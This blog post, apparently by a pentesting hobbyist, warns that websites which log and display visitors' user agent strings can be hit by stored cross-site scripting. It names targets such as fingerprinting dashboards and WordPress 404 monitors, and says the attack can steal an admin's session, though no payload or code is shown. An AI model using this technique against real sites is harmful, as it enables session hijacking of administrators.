I few days ago I’ve done some tests with Firefox add-on called User Agent Switcher. What I was trying to test is how social networks (Twitter, Facebook, Foursquare) react to sudden change in user agent. But then I came to a better idea. User agents, along with other data from your browser (browser info) and PC, are being increasingly used to track users on the web for marketing and security reasons. These data are in the core of systems called cookieless device fingerprinting. Number of websites that use this type of data is growing as we speak. If you don’t control how you store an show this data in your admin panel there is an easy way for you to get XSSed. In this post I’ll show you how.
Here is the experimental video:
What have I done?
In possible attack scenario attacker will put malicious .js in his user agent. As a result of the attack he can steal your session and your admin URL.
Another point of failure can be 404 monitors for your wordpress site (all of them use user agents) where attacker can intentionally trigger broken link with malicious user agent.
For security reasons you should check how you collect and how you store this data.
How hard is this?
Well, I’m not even a programmer. For my job requirements I’ve learned some basics of pentesting. Thats all. I would say that this is the easy one.
I’m also aware that this attack concept is not new but increased usage of this data nowadays can lead to compromising security if it’s not properly done.
1+ for Cloud Flare who blocks users with faulty user agents!